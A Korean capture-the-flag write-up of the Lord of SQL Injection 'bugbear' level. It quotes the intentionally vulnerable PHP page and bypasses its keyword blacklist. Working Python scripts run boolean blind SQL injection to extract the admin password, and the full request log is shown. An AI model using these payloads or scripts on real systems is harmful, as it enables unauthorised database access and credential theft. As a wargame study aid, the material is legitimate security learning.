[Lord Of SQL Injection] 13번 본문
query : select id from prob_bugbear where id='guest' and pw='' and no=
<?php 
  // Lord of SQL Injection challenge "bugbear": an intentionally vulnerable page.
  // Both queries below are assembled by string interpolation of $_GET values;
  // the regex blacklists are the only "defence". The real fix is a prepared
  // statement (mysqli_prepare + mysqli_stmt_bind_param), not a longer blacklist.
  // Bare keys like $_GET[no] are undefined constants: a notice before PHP 8,
  // a fatal Error from PHP 8 onward.
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  // Blacklist 1 (case-insensitive): no= may not contain prob, _, ., or "()".
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
  // Blacklist 2: pw= may not contain a single quote.
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
  // Blacklist 3: no= may additionally not contain ', substr, ascii, =, or, and,
  // a space character, like, or 0x.
  if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe"); 
  // no is interpolated unquoted and unescaped, pw only quote-filtered:
  // this line is the injection point the blacklists fail to close.
  $query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  // @ suppresses mysqli warnings, so a malformed query silently yields no row.
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  // Whether this greeting appears is the yes/no signal a blind probe observes.
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  // addslashes() escapes pw for the second query; it also mutates the value
  // that is compared against the DB result two lines below.
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  // Loose == comparison on a credential; === is the safe form.
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear"); 
  highlight_file(__FILE__); 
?>
12번 문제의 필터에 더해 or, and, like, 0x도 추가로 필터링된다.
"?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,"+str(i)+"),1)%09in(%22"+str(j)+"%22)%23"
#?no="" || id in("admin") && right(left(pw,1),1) in("5")#
그래서 추가적으로 변경이 필요했다.
|| -> %7C%7C
like -> in("")
&& -> %26%26 (&는 쿼리스트링의 파라미터 구분자이므로 URL 인코딩이 필요하다)
패스워드 길이 알아내기
import requests
import string

# Boolean-based blind probe for the password length: the challenge page prints
# "Hello admin" only when the injected predicate holds, so every request yields
# one yes/no answer. Defensive takeaway: the blacklist on no= does not stop
# this; only a parameterised query removes the injection point.
url = "https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php"
cookie = dict(PHPSESSID="쿠키값")

candidate = 1
while candidate < 100:
    probe = url + "?no=%22%22||%09length(pw)in(%22" + str(candidate) + "%22)%23"
    page = requests.get(probe, cookies=cookie).text
    if page.find("Hello admin") > 0:
        print("password :" + str(candidate))
        break
    candidate += 1
패스워드 알아내기
import requests
import string

# Position-by-position recovery over the 8-character length found by the
# previous script. Each request asks a single yes/no question about one
# character; the first confirmed guess at a position ends the inner loop.
url = "https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php"
cookie = dict(PHPSESSID="쿠키값")
alphabet = string.digits + string.ascii_letters
recovered = ""

for position in range(1, 9):
    for guess in alphabet:
        query = ("?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09"
                 "right(left(pw," + str(position) + "),1)%09in(%22" + guess + "%22)%23")
        print(query)
        page = requests.get(url + query, cookies=cookie).text
        if page.find("Hello admin") > 0:
            print(str(position) + "번째 패스워드 :" + guess)
            recovered += guess
            break

print("pw :" + recovered)
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,1),1)%09in(%220%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,1),1)%09in(%221%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,1),1)%09in(%222%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,1),1)%09in(%223%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,1),1)%09in(%224%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,1),1)%09in(%225%22)%23 
1번째 패스워드 :5 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,2),1)%09in(%220%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,2),1)%09in(%221%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,2),1)%09in(%222%22)%23 
2번째 패스워드 :2 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%220%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%221%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%222%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%223%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%224%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%225%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%226%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%227%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%228%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%229%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%22a%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%22b%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%22c%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%22d%22)%23 
3번째 패스워드 :d 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%220%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%221%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%222%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%223%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%224%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%225%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%226%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%227%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%228%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%229%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%22a%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%22b%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%22c%22)%23 
4번째 패스워드 :c 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,5),1)%09in(%220%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,5),1)%09in(%221%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,5),1)%09in(%222%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,5),1)%09in(%223%22)%23 
5번째 패스워드 :3 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%220%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%221%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%222%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%223%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%224%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%225%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%226%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%227%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%228%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%229%22)%23 
6번째 패스워드 :9 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%220%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%221%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%222%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%223%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%224%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%225%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%226%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%227%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%228%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%229%22)%23 
7번째 패스워드 :9 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,8),1)%09in(%220%22)%23 
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,8),1)%09in(%221%22)%23 
8번째 패스워드 :1 
pw :52dc3991